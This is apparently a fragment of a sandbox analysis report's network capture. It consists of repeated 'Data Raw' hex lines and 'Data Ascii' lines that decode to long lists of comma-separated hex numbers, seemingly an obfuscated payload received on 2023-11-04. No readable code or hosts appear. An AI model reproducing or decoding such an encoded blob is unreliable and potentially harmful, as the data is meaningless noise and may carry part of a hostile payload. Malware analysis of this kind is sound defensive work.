                                                                                                                                                                                                                            Data Ascii: 1,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4d,52,6b,54,159,166,161,137,e4,123,9b,6d,6d,7c,d6,4d,33,41,51,63,141,93,9a,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4c,77,43,34,131,140,150,162,122,114,99,46,5a,3e,103,5c,50,31,4e,6c,64,81,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC447INData Raw: 2c 31 35 38 2c 31 31 33 2c 61 34 2c 31 33 35 2c 31 36 35 2c 31 33 62 2c 31 35 65 2c 31 33 63 2c 31 35 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 33 32 2c 31 35 34 2c 31 34 36 2c 31 34 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 33 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 39 2c 38 62 2c 31 34 37 2c 31 35 65 2c 65 64 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 35 32 2c 31 33 65 2c 31 35 34 2c 36 38 2c 62 63 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c
                                                                                                                                                                                                                            Data Ascii: ,158,113,a4,135,165,13b,15e,13c,158,134,125,123,132,132,154,146,146,149,137,129,12a,161,134,130,122,13f,15d,13d,143,15c,145,14b,158,153,129,139,8b,147,15e,ed,168,134,125,123,52,13e,154,68,bc,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC463INData Raw: 31 2c 66 66 2c 66 34 2c 31 35 66 2c 31 31 63 2c 65 37 2c 31 31 32 2c 31 33 66 2c 31 35 62 2c 31 32 33 2c 31 30 66 2c 31 35 61 2c 31 34 33 2c 31 32 31 2c 31 33 66 2c 31 32 39 2c 37 33 2c 31 33 33 2c 31 34 36 2c 31 33 62 2c 64 31 2c 31 33 39 2c 31 36 38 2c 31 33 34 2c 31 32 33 2c 61 36 2c 31 31 37 2c 31 34 32 2c 31 35 34 2c 31 34 32 2c 31 35 34 2c 31 32 61 2c 31 32 37 2c 39 63 2c 31 32 37 2c 31 36 31 2c 31 33 34 2c 31 33 65 2c 61 35 2c 31 32 33 2c 31 35 64 2c 31 33 64 2c 31 33 66 2c 31 35 61 2c 31 32 37 2c 64 38 2c 31 34 65 2c 31 35 33 2c 31 32 39 2c 31 32 66 2c 65 38 2c 31 32 63 2c 31 35 65 2c 31 33 63 2c 31 36 34 2c 31 33 32 2c 66 64 2c 63 62 2c 31 33 32 2c 31 34 32 2c 31 34 61 2c 31 31 63 2c 64 30 2c 31 34 36 2c 31 33 35 2c 61 65 2c 31 30 36 2c 31 36 31
                                                                                                                                                                                                                            Data Ascii: 1,ff,f4,15f,11c,e7,112,13f,15b,123,10f,15a,143,121,13f,129,73,133,146,13b,d1,139,168,134,123,a6,117,142,154,142,154,12a,127,9c,127,161,134,13e,a5,123,15d,13d,13f,15a,127,d8,14e,153,129,12f,e8,12c,15e,13c,164,132,fd,cb,132,142,14a,11c,d0,146,135,ae,106,161
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC479INData Raw: 31 35 38 2c 31 34 39 2c 66 66 2c 62 62 2c 31 36 33 2c 31 32 33 2c 31 33 38 2c 31 33 62 2c 31 36 38 2c 31 32 61 2c 66 39 2c 31 32 31 2c 31 31 63 2c 31 31 38 2c 31 35 32 2c 31 32 36 2c 39 38 2c 31 32 66 2c 34 36 2c 61 64 2c 66 66 2c 31 36 31 2c 31 30 63 2c 31 33 64 2c 31 32 32 2c 31 33 66 2c 31 33 32 2c 31 31 66 2c 31 31 62 2c 31 31 30 2c 31 34 33 2c 31 34 62 2c 31 34 65 2c 31 32 39 2c 37 62 2c 62 37 2c 39 39 2c 31 34 62 2c 31 35 65 2c 31 33 38 2c 31 36 61 2c 31 32 65 2c 39 30 2c 31 32 32 2c 31 33 32 2c 31 33 63 2c 65 31 2c 66 39 2c 31 35 34 2c 31 34 39 2c 31 32 64 2c 61 39 2c 36 30 2c 31 36 31 2c 31 33 34 2c 31 33 63 2c 61 34 2c 37 33 2c 31 35 64 2c 31 33 64 2c 31 33 66 2c 31 35 65 2c 31 33 66 2c 62 35 2c 31 35 37 2c 31 35 33 2c 31 32 33 2c 63 32 2c 31 31
                                                                                                                                                                                                                            Data Ascii: 158,149,ff,bb,163,123,138,13b,168,12a,f9,121,11c,118,152,126,98,12f,46,ad,ff,161,10c,13d,122,13f,132,11f,11b,110,143,14b,14e,129,7b,b7,99,14b,15e,138,16a,12e,90,122,132,13c,e1,f9,154,149,12d,a9,60,161,134,13c,a4,73,15d,13d,13f,15e,13f,b5,157,153,123,c2,11
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC495INData Raw: 2c 31 34 30 2c 31 34 38 2c 64 36 2c 65 66 2c 31 35 35 2c 31 35 33 2c 31 31 66 2c 31 30 62 2c 31 33 33 2c 31 34 39 2c 31 33 32 2c 31 33 34 2c 31 36 36 2c 31 33 31 2c 31 32 31 2c 62 34 2c 64 36 2c 31 33 66 2c 31 35 34 2c 31 33 63 2c 31 32 63 2c 31 30 37 2c 31 33 35 2c 66 64 2c 31 31 65 2c 31 35 66 2c 31 33 31 2c 31 31 38 2c 64 66 2c 31 33 66 2c 31 35 64 2c 31 31 32 2c 64 34 2c 66 65 2c 31 34 32 2c 31 34 62 2c 31 34 65 2c 31 32 39 2c 66 37 2c 31 33 33 2c 31 33 39 2c 31 34 33 2c 31 35 63 2c 31 33 39 2c 31 36 34 2c 63 35 2c 63 37 2c 31 32 30 2c 31 33 32 2c 31 33 38 2c 31 32 61 2c 31 31 34 2c 31 35 34 2c 63 62 2c 64 38 2c 31 32 36 2c 31 32 61 2c 31 35 37 2c 31 30 63 2c 65 30 2c 31 31 66 2c 31 33 66 2c 31 35 33 2c 31 31 33 2c 31 31 31 2c 31 35 61 2c 63 37 2c 65
                                                                                                                                                                                                                            Data Ascii: ,140,148,d6,ef,155,153,11f,10b,133,149,132,134,166,131,121,b4,d6,13f,154,13c,12c,107,135,fd,11e,15f,131,118,df,13f,15d,112,d4,fe,142,14b,14e,129,f7,133,139,143,15c,139,164,c5,c7,120,132,138,12a,114,154,cb,d8,126,12a,157,10c,e0,11f,13f,153,113,111,15a,c7,e
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC511INData Raw: 30 2c 31 34 33 2c 31 35 35 2c 31 32 38 2c 31 30 62 2c 31 34 33 2c 31 34 39 2c 31 35 62 2c 31 31 34 2c 64 64 2c 31 33 30 2c 31 32 35 2c 31 31 39 2c 31 30 38 2c 31 32 30 2c 31 35 32 2c 31 34 33 2c 31 32 65 2c 62 64 2c 31 33 33 2c 31 32 39 2c 31 32 30 2c 31 33 37 2c 63 65 2c 31 33 31 2c 31 32 31 2c 31 33 64 2c 31 33 35 2c 62 30 2c 31 33 66 2c 31 35 63 2c 31 33 62 2c 31 33 36 2c 31 32 35 2c 31 34 37 2c 31 31 61 2c 31 33 35 2c 31 36 31 2c 31 32 33 2c 64 31 2c 31 33 38 2c 31 36 38 2c 31 32 61 2c 31 31 30 2c 31 32 35 2c 31 33 31 2c 31 31 38 2c 31 33 65 2c 31 31 63 2c 31 31 63 2c 31 34 36 2c 31 33 35 2c 31 30 31 2c 63 34 2c 31 36 31 2c 31 33 34 2c 31 31 35 2c 31 30 64 2c 31 34 31 2c 31 35 63 2c 31 32 37 2c 31 34 35 2c 31 35 62 2c 31 31 62 2c 64 39 2c 31 34 39 2c
                                                                                                                                                                                                                            Data Ascii: 0,143,155,128,10b,143,149,15b,114,dd,130,125,119,108,120,152,143,12e,bd,133,129,120,137,ce,131,121,13d,135,b0,13f,15c,13b,136,125,147,11a,135,161,123,d1,138,168,12a,110,125,131,118,13e,11c,11c,146,135,101,c4,161,134,115,10d,141,15c,127,145,15b,11b,d9,149,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC527INData Raw: 65 2c 31 31 66 2c 31 33 62 2c 31 33 35 2c 61 34 2c 31 33 65 2c 31 35 63 2c 31 33 62 2c 31 32 31 2c 31 33 36 2c 31 35 31 2c 31 32 36 2c 31 30 64 2c 66 30 2c 31 34 36 2c 31 35 65 2c 31 33 32 2c 31 33 65 2c 31 30 65 2c 31 32 33 2c 31 32 30 2c 31 32 65 2c 31 31 61 2c 64 65 2c 31 34 31 2c 31 35 36 2c 31 33 66 2c 31 30 64 2c 31 30 37 2c 31 32 38 2c 31 35 65 2c 31 30 63 2c 61 36 2c 31 31 64 2c 31 33 66 2c 31 35 33 2c 31 31 33 2c 31 31 64 2c 31 35 61 2c 31 34 32 2c 31 34 37 2c 31 33 30 2c 62 38 2c 31 32 34 2c 31 33 35 2c 31 35 62 2c 31 32 31 2c 31 34 30 2c 31 33 61 2c 31 34 30 2c 39 38 2c 31 32 30 2c 31 32 33 2c 31 32 38 2c 31 31 38 2c 31 33 32 2c 31 34 34 2c 31 35 33 2c 31 32 31 2c 39 61 2c 31 32 34 2c 31 32 61 2c 31 35 37 2c 31 30 61 2c 31 31 65 2c 31 32 30 2c
                                                                                                                                                                                                                            Data Ascii: e,11f,13b,135,a4,13e,15c,13b,121,136,151,126,10d,f0,146,15e,132,13e,10e,123,120,12e,11a,de,141,156,13f,10d,107,128,15e,10c,a6,11d,13f,153,113,11d,15a,142,147,130,b8,124,135,15b,121,140,13a,140,98,120,123,128,118,132,144,153,121,9a,124,12a,157,10a,11e,120,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC543INData Raw: 37 65 2c 31 34 61 2c 31 35 65 2c 31 33 38 2c 31 33 65 2c 31 31 36 2c 31 32 33 2c 61 38 2c 34 61 2c 31 34 31 2c 31 35 34 2c 31 34 32 2c 31 32 63 2c 31 32 37 2c 31 33 35 2c 31 32 36 2c 61 64 2c 37 39 2c 31 33 33 2c 31 34 30 2c 31 31 65 2c 31 31 35 2c 31 33 66 2c 31 33 62 2c 63 38 2c 37 33 2c 31 34 34 2c 31 34 62 2c 31 35 34 2c 31 32 39 2c 31 30 37 2c 31 33 33 2c 31 36 32 2c 63 65 2c 37 35 2c 31 33 62 2c 31 36 38 2c 31 33 30 2c 66 62 2c 31 30 35 2c 31 33 30 2c 63 37 2c 36 61 2c 31 34 35 2c 31 35 36 2c 31 34 35 2c 31 30 64 2c 31 30 37 2c 31 32 38 2c 31 35 65 2c 62 37 2c 35 36 2c 31 32 31 2c 31 33 66 2c 31 35 39 2c 31 31 33 2c 31 32 35 2c 31 35 61 2c 63 61 2c 36 30 2c 31 35 37 2c 31 35 33 2c 31 32 35 2c 31 30 62 2c 31 34 33 2c 31 34 39 2c 31 35 62 2c 62 66 2c
                                                                                                                                                                                                                            Data Ascii: 7e,14a,15e,138,13e,116,123,a8,4a,141,154,142,12c,127,135,126,ad,79,133,140,11e,115,13f,13b,c8,73,144,14b,154,129,107,133,162,ce,75,13b,168,130,fb,105,130,c7,6a,145,156,145,10d,107,128,15e,b7,56,121,13f,159,113,125,15a,ca,60,157,153,125,10b,143,149,15b,bf,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC559INData Raw: 33 2c 31 34 30 2c 64 39 2c 31 33 36 2c 31 35 36 2c 31 34 39 2c 31 33 33 2c 62 61 2c 31 30 39 2c 31 36 31 2c 31 33 34 2c 31 33 61 2c 31 30 63 2c 31 33 35 2c 31 33 32 2c 31 32 38 2c 31 34 31 2c 65 31 2c 31 33 32 2c 31 34 62 2c 31 35 38 2c 31 34 66 2c 31 32 33 2c 61 36 2c 31 36 32 2c 31 34 62 2c 31 35 65 2c 31 33 61 2c 31 34 30 2c 31 32 39 2c 31 32 35 2c 31 32 33 2c 31 32 63 2c 31 33 63 2c 31 33 64 2c 65 65 2c 31 34 63 2c 31 34 33 2c 31 31 64 2c 66 32 2c 34 33 2c 31 34 62 2c 31 32 61 2c 31 31 35 2c 31 30 64 2c 31 33 64 2c 65 32 2c 31 32 62 2c 31 34 33 2c 31 35 63 2c 31 34 31 2c 31 34 35 2c 63 39 2c 31 35 31 2c 31 32 39 2c 31 33 35 2c 31 36 33 2c 31 32 33 2c 31 35 36 2c 31 33 63 2c 31 36 38 2c 31 32 65 2c 31 31 66 2c 31 30 63 2c 64 61 2c 31 33 38 2c 31 34 65
                                                                                                                                                                                                                            Data Ascii: 3,140,d9,136,156,149,133,ba,109,161,134,13a,10c,135,132,128,141,e1,132,14b,158,14f,123,a6,162,14b,15e,13a,140,129,125,123,12c,13c,13d,ee,14c,143,11d,f2,43,14b,12a,115,10d,13d,e2,12b,143,15c,141,145,c9,151,129,135,163,123,156,13c,168,12e,11f,10c,da,138,14e
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC575INData Raw: 31 34 39 2c 31 32 64 2c 34 64 2c 31 32 38 2c 65 36 2c 66 32 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 65 61 2c 61 66 2c 31 34 33 2c 31 35 63 2c 31 33 62 2c 31 33 38 2c 31 35 33 2c 65 30 2c 61 65 2c 31 33 35 2c 31 36 35 2c 31 34 31 2c 31 33 39 2c 31 32 35 2c 66 39 2c 62 38 2c 31 32 35 2c 31 32 33 2c 31 32 38 2c 31 31 64 2c 31 33 65 2c 64 37 2c 64 39 2c 31 34 39 2c 31 33 37 2c 31 31 66 2c 31 31 37 2c 31 35 62 2c 31 32 65 2c 31 33 65 2c 62 33 2c 61 64 2c 31 35 64 2c 31 33 64 2c 31 33 39 2c 31 35 61 2c 64 36 2c 62 38 2c 31 35 38 2c 31 35 33 2c 31 31 66 2c 31 32 34 2c 31 36 30 2c 31 34 39 2c 65 33 2c 66 65 2c 31 36 38 2c 31 33 34 2c 31 32 31 2c 66 62 2c 39 65 2c 31 34 32 2c 31 35 34 2c 31 33 63 2c 31 34 35 2c 31 34 33 2c 63 38 2c 39 34 2c 31 32 61 2c 31 36 31 2c
                                                                                                                                                                                                                            Data Ascii: 149,12d,4d,128,e6,f2,140,122,13b,ea,af,143,15c,13b,138,153,e0,ae,135,165,141,139,125,f9,b8,125,123,128,11d,13e,d7,d9,149,137,11f,117,15b,12e,13e,b3,ad,15d,13d,139,15a,d6,b8,158,153,11f,124,160,149,e3,fe,168,134,121,fb,9e,142,154,13c,145,143,c8,94,12a,161,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC591INData Raw: 33 36 2c 31 32 30 2c 35 64 2c 31 32 37 2c 31 31 39 2c 31 33 36 2c 31 33 34 2c 31 31 38 2c 31 31 66 2c 31 33 66 2c 31 35 64 2c 31 31 32 2c 64 34 2c 31 34 39 2c 31 34 34 2c 31 34 62 2c 31 34 65 2c 31 32 36 2c 31 31 62 2c 31 32 34 2c 31 36 31 2c 64 30 2c 65 62 2c 31 33 63 2c 31 36 38 2c 31 33 30 2c 66 64 2c 31 32 32 2c 31 32 39 2c 31 34 32 2c 31 34 65 2c 31 31 62 2c 31 34 61 2c 31 33 38 2c 31 33 33 2c 61 65 2c 62 37 2c 31 36 31 2c 31 33 34 2c 31 33 63 2c 66 61 2c 31 33 66 2c 31 35 34 2c 31 33 64 2c 31 33 64 2c 31 34 39 2c 31 33 66 2c 31 33 61 2c 31 35 32 2c 31 32 62 2c 31 31 35 2c 31 33 34 2c 31 36 35 2c 31 34 31 2c 31 32 34 2c 36 31 2c 31 36 35 2c 31 33 34 2c 31 32 35 2c 31 31 32 2c 31 32 63 2c 31 32 63 2c 65 35 2c 31 33 31 2c 31 35 35 2c 31 34 39 2c 31 32
                                                                                                                                                                                                                            Data Ascii: 36,120,5d,127,119,136,134,118,11f,13f,15d,112,d4,149,144,14b,14e,126,11b,124,161,d0,eb,13c,168,130,fd,122,129,142,14e,11b,14a,138,133,ae,b7,161,134,13c,fa,13f,154,13d,13d,149,13f,13a,152,12b,115,134,165,141,124,61,165,134,125,112,12c,12c,e5,131,155,149,12
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC607INData Raw: 2c 31 35 30 2c 31 32 39 2c 31 33 35 2c 31 33 61 2c 63 64 2c 37 37 2c 31 33 63 2c 31 36 38 2c 31 32 61 2c 66 64 2c 31 31 36 2c 31 33 31 2c 31 34 32 2c 31 34 61 2c 31 31 65 2c 66 30 2c 31 34 38 2c 31 33 37 2c 31 31 66 2c 66 65 2c 31 33 65 2c 31 32 65 2c 31 33 61 2c 62 33 2c 31 34 64 2c 31 35 35 2c 31 33 64 2c 31 33 64 2c 31 33 63 2c 31 30 66 2c 62 37 2c 63 32 2c 31 33 62 2c 66 65 2c 31 33 35 2c 31 33 64 2c 31 34 61 2c 31 35 65 2c 31 33 63 2c 31 33 64 2c 31 32 63 2c 62 36 2c 62 63 2c 31 33 31 2c 31 34 32 2c 31 34 61 2c 31 31 65 2c 65 65 2c 31 34 38 2c 31 33 37 2c 31 31 66 2c 62 62 2c 31 36 65 2c 31 32 63 2c 31 34 30 2c 31 31 63 2c 31 33 37 2c 65 65 2c 64 38 2c 31 34 32 2c 31 35 63 2c 31 33 62 2c 31 32 62 2c 64 31 2c 37 37 2c 31 32 37 2c 31 31 38 2c 31 33 64
                                                                                                                                                                                                                            Data Ascii: ,150,129,135,13a,cd,77,13c,168,12a,fd,116,131,142,14a,11e,f0,148,137,11f,fe,13e,12e,13a,b3,14d,155,13d,13d,13c,10f,b7,c2,13b,fe,135,13d,14a,15e,13c,13d,12c,b6,bc,131,142,14a,11e,ee,148,137,11f,bb,16e,12c,140,11c,137,ee,d8,142,15c,13b,12b,d1,77,127,118,13d
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC623INData Raw: 32 2c 31 30 64 2c 31 33 34 2c 31 34 30 2c 31 31 38 2c 31 32 38 2c 64 30 2c 31 33 62 2c 31 34 32 2c 31 35 63 2c 31 34 34 2c 31 32 36 2c 31 34 32 2c 31 33 64 2c 31 31 35 2c 31 30 64 2c 31 31 61 2c 31 34 61 2c 31 35 65 2c 31 33 32 2c 63 36 2c 31 30 63 2c 39 63 2c 31 32 32 2c 31 33 32 2c 31 33 38 2c 31 32 63 2c 66 39 2c 31 35 35 2c 31 34 39 2c 31 32 64 2c 61 39 2c 38 63 2c 31 36 31 2c 31 33 34 2c 31 33 63 2c 61 34 2c 61 31 2c 31 35 64 2c 31 33 64 2c 31 33 66 2c 65 31 2c 66 37 2c 31 34 61 2c 31 35 38 2c 31 34 39 2c 61 62 2c 39 37 2c 31 36 35 2c 31 34 62 2c 31 35 61 2c 62 65 2c 63 62 2c 31 33 34 2c 31 32 35 2c 31 31 66 2c 31 30 35 2c 31 30 63 2c 31 33 65 2c 31 32 36 2c 31 35 39 2c 63 63 2c 31 33 30 2c 63 36 2c 66 66 2c 31 36 31 2c 31 30 63 2c 31 33 64 2c 31 32
                                                                                                                                                                                                                            Data Ascii: 2,10d,134,140,118,128,d0,13b,142,15c,144,126,142,13d,115,10d,11a,14a,15e,132,c6,10c,9c,122,132,138,12c,f9,155,149,12d,a9,8c,161,134,13c,a4,a1,15d,13d,13f,e1,f7,14a,158,149,ab,97,165,14b,15a,be,cb,134,125,11f,105,10c,13e,126,159,cc,130,c6,ff,161,10c,13d,12
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC639INData Raw: 31 64 2c 31 33 63 2c 31 33 35 2c 31 35 30 2c 61 37 2c 31 31 32 2c 31 31 30 2c 31 30 61 2c 39 62 2c 31 31 37 2c 39 30 2c 64 65 2c 31 31 34 2c 31 35 64 2c 31 31 35 2c 31 33 65 2c 31 35 63 2c 31 34 35 2c 31 32 30 2c 62 36 2c 31 32 65 2c 31 30 66 2c 31 32 33 2c 31 35 63 2c 31 32 33 2c 61 32 2c 31 33 62 2c 31 36 38 2c 31 32 61 2c 38 33 2c 66 62 2c 37 35 2c 31 34 31 2c 31 35 34 2c 31 33 63 2c 65 37 2c 31 34 35 2c 31 32 65 2c 31 32 39 2c 31 32 34 2c 31 35 30 2c 31 32 61 2c 31 32 61 2c 62 33 2c 31 33 35 2c 31 35 34 2c 31 33 64 2c 31 33 64 2c 31 34 62 2c 31 33 62 2c 31 33 61 2c 31 35 34 2c 31 33 33 2c 33 64 2c 65 33 2c 31 36 38 2c 38 37 2c 31 33 36 2c 31 32 61 2c 31 36 38 2c 31 33 34 2c 66 61 2c 62 30 2c 31 32 36 2c 31 34 31 2c 31 35 34 2c 31 33 63 2c 31 34 34 2c
                                                                                                                                                                                                                            Data Ascii: 1d,13c,135,150,a7,112,110,10a,9b,117,90,de,114,15d,115,13e,15c,145,120,b6,12e,10f,123,15c,123,a2,13b,168,12a,83,fb,75,141,154,13c,e7,145,12e,129,124,150,12a,12a,b3,135,154,13d,13d,14b,13b,13a,154,133,3d,e3,168,87,136,12a,168,134,fa,b0,126,141,154,13c,144,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC655INData Raw: 2c 31 35 61 2c 31 34 35 2c 65 66 2c 62 39 2c 31 35 66 2c 31 33 34 2c 31 31 66 2c 31 31 63 2c 63 33 2c 65 65 2c 31 34 62 2c 31 34 36 2c 31 35 30 2c 31 31 66 2c 31 33 37 2c 31 31 36 2c 66 61 2c 31 35 66 2c 31 33 34 2c 65 62 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 30 31 2c 31 34 33 2c 31 35 63 2c 31 33 34 2c 31 34 39 2c 31 30 38 2c 65 34 2c 31 30 61 2c 31 33 34 2c 31 36 35 2c 31 34 35 2c 31 33 38 2c 31 33 61 2c 31 31 38 2c 63 35 2c 31 30 35 2c 31 32 32 2c 31 33 32 2c 31 33 63 2c 31 34 61 2c 31 34 34 2c 31 30 36 2c 64 61 2c 31 31 36 2c 31 32 38 2c 31 32 61 2c 31 35 62 2c 31 32 39 2c 31 33 61 2c 62 33 2c 31 32 37 2c 31 35 34 2c 31 33 64 2c 31 33 64 2c 31 33 30 2c 31 31 31 2c 64 38 2c 31 35 31 2c 31 35 32 2c 31 32 39 2c 31 32 62 2c 31 35 39 2c 31 34 33 2c 31
                                                                                                                                                                                                                            Data Ascii: ,15a,145,ef,b9,15f,134,11f,11c,c3,ee,14b,146,150,11f,137,116,fa,15f,134,eb,122,13f,15d,101,143,15c,134,149,108,e4,10a,134,165,145,138,13a,118,c5,105,122,132,13c,14a,144,106,da,116,128,12a,15b,129,13a,b3,127,154,13d,13d,130,111,d8,151,152,129,12b,159,143,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC671INData Raw: 2c 31 34 65 2c 62 35 2c 31 34 64 2c 31 33 32 2c 64 65 2c 31 30 61 2c 31 30 62 2c 31 30 32 2c 64 31 2c 31 32 30 2c 31 32 33 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 33 61 2c 31 33 64 2c 31 32 36 2c 65 63 2c 66 35 2c 66 34 2c 31 32 37 2c 62 61 2c 62 31 2c 31 34 62 2c 31 35 65 2c 31 33 38 2c 31 35 37 2c 31 32 65 2c 31 30 65 2c 63 61 2c 61 31 2c 31 33 31 2c 31 35 30 2c 31 32 37 2c 31 33 37 2c 65 61 2c 64 35 2c 63 39 2c 35 38 2c 63 35 2c 31 32 62 2c 31 32 39 2c 63 61 2c 31 33 32 2c 31 34 63 2c 31 33 38 2c 31 32 63 2c 31 30 34 2c 31 33 32 2c 31 34 36 2c 31 34 37 2c 31 34 66 2c 31 31 32 2c 64 63 2c 31 35 32 2c 31 34 37 2c 31 33 33 2c 31 31 39 2c 31 36 30 2c 31 30 37 2c 31 30 35 2c 31 31 64 2c 31 32 31 2c 31 33 64 2c 31 35 32 2c 63 62 2c 61 32 2c 31 34 39 2c 31
                                                                                                                                                                                                                            Data Ascii: ,14e,b5,14d,132,de,10a,10b,102,d1,120,123,13f,15d,13d,13a,13d,126,ec,f5,f4,127,ba,b1,14b,15e,138,157,12e,10e,ca,a1,131,150,127,137,ea,d5,c9,58,c5,12b,129,ca,132,14c,138,12c,104,132,146,147,14f,112,dc,152,147,133,119,160,107,105,11d,121,13d,152,cb,a2,149,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC687INData Raw: 34 35 2c 64 30 2c 64 33 2c 31 33 36 2c 34 63 2c 31 31 66 2c 66 39 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 33 33 2c 31 32 36 2c 31 34 36 2c 31 33 37 2c 31 30 33 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 33 39 2c 31 32 32 2c 31 33 66 2c 31 34 63 2c 31 33 62 2c 31 34 30 2c 65 64 2c 62 38 2c 31 34 39 2c 31 35 38 2c 31 34 39 2c 31 31 66 2c 31 30 61 2c 31 34 65 2c 31 34 39 2c 31 35 38 2c 63 64 2c 64 61 2c 31 33 32 2c 31 32 35 2c 31 31 39 2c 31 33 30 2c 31 33 63 2c 31 35 30 2c 64 37 2c 63 37 2c 31 34 37 2c 31 33 37 2c 31 31 66 2c 31 32 38 2c 31 35 65 2c 63 35 2c 62 33 2c 31 32 30 2c 31 33 66 2c 31 35 33 2c 31 33 33 2c 31 33 64 2c 31 34 36 2c 31 31 35 2c 36 36 2c 31 32 65 2c 31 35 33 2c 31 32 39 2c 31 32 32 2c 31 33 35 2c 31 34 37 2c 31 35 65 2c 31 30 61 2c 31
                                                                                                                                                                                                                            Data Ascii: 45,d0,d3,136,4c,11f,f9,132,142,154,133,126,146,137,103,12a,161,134,139,122,13f,14c,13b,140,ed,b8,149,158,149,11f,10a,14e,149,158,cd,da,132,125,119,130,13c,150,d7,c7,147,137,11f,128,15e,c5,b3,120,13f,153,133,13d,146,115,66,12e,153,129,122,135,147,15e,10a,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC703INData Raw: 35 2c 31 32 39 2c 31 30 32 2c 63 34 2c 31 33 31 2c 31 34 30 2c 31 31 38 2c 31 31 35 2c 31 35 64 2c 31 32 61 2c 31 31 33 2c 31 35 61 2c 31 34 35 2c 31 33 38 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 62 66 2c 31 36 35 2c 31 34 62 2c 31 34 64 2c 31 33 61 2c 31 33 62 2c 31 33 32 2c 31 30 65 2c 66 39 2c 31 33 30 2c 64 33 2c 38 39 2c 31 34 35 2c 31 35 36 2c 31 33 66 2c 31 32 35 2c 31 32 39 2c 31 30 32 2c 63 33 2c 31 33 31 2c 31 34 30 2c 31 31 38 2c 31 31 35 2c 31 35 64 2c 31 32 61 2c 31 31 33 2c 31 35 61 2c 31 34 35 2c 31 33 38 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 62 65 2c 31 36 35 2c 31 34 62 2c 31 34 64 2c 31 33 61 2c 31 33 62 2c 31 33 32 2c 31 30 65 2c 66 39 2c 31 33 30 2c 64 33 2c 38 39 2c 31 34 35 2c 31 35 36 2c 31 33 66 2c 31 32 35 2c 31 32 39 2c 31 30 32
                                                                                                                                                                                                                            Data Ascii: 5,129,102,c4,131,140,118,115,15d,12a,113,15a,145,138,158,153,129,bf,165,14b,14d,13a,13b,132,10e,f9,130,d3,89,145,156,13f,125,129,102,c3,131,140,118,115,15d,12a,113,15a,145,138,158,153,129,be,165,14b,14d,13a,13b,132,10e,f9,130,d3,89,145,156,13f,125,129,102
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC719INData Raw: 61 2c 31 36 31 2c 31 33 34 2c 63 30 2c 31 32 32 2c 31 33 66 2c 31 34 63 2c 31 33 62 2c 31 31 37 2c 31 35 34 2c 31 34 33 2c 63 64 2c 61 62 2c 31 35 30 2c 31 32 39 2c 31 32 62 2c 31 33 32 2c 31 33 66 2c 31 34 63 2c 31 33 63 2c 31 36 61 2c 31 31 66 2c 39 63 2c 31 32 33 2c 31 33 32 2c 31 32 37 2c 31 34 65 2c 31 33 63 2c 37 38 2c 31 33 31 2c 31 33 35 2c 31 30 31 2c 37 30 2c 31 35 65 2c 31 33 34 2c 31 33 36 2c 61 66 2c 36 63 2c 31 35 61 2c 31 33 64 2c 31 33 39 2c 31 35 32 2c 36 37 2c 31 34 31 2c 31 33 32 2c 31 33 64 2c 62 36 2c 36 32 2c 31 36 32 2c 31 34 62 2c 31 35 34 2c 31 33 32 2c 38 61 2c 31 33 34 2c 31 31 66 2c 66 39 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 34 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 31
                                                                                                                                                                                                                            Data Ascii: a,161,134,c0,122,13f,14c,13b,117,154,143,cd,ab,150,129,12b,132,13f,14c,13c,16a,11f,9c,123,132,127,14e,13c,78,131,135,101,70,15e,134,136,af,6c,15a,13d,139,152,67,141,132,13d,b6,62,162,14b,154,132,8a,134,11f,f9,132,142,154,145,146,149,137,129,12a,161,134,11
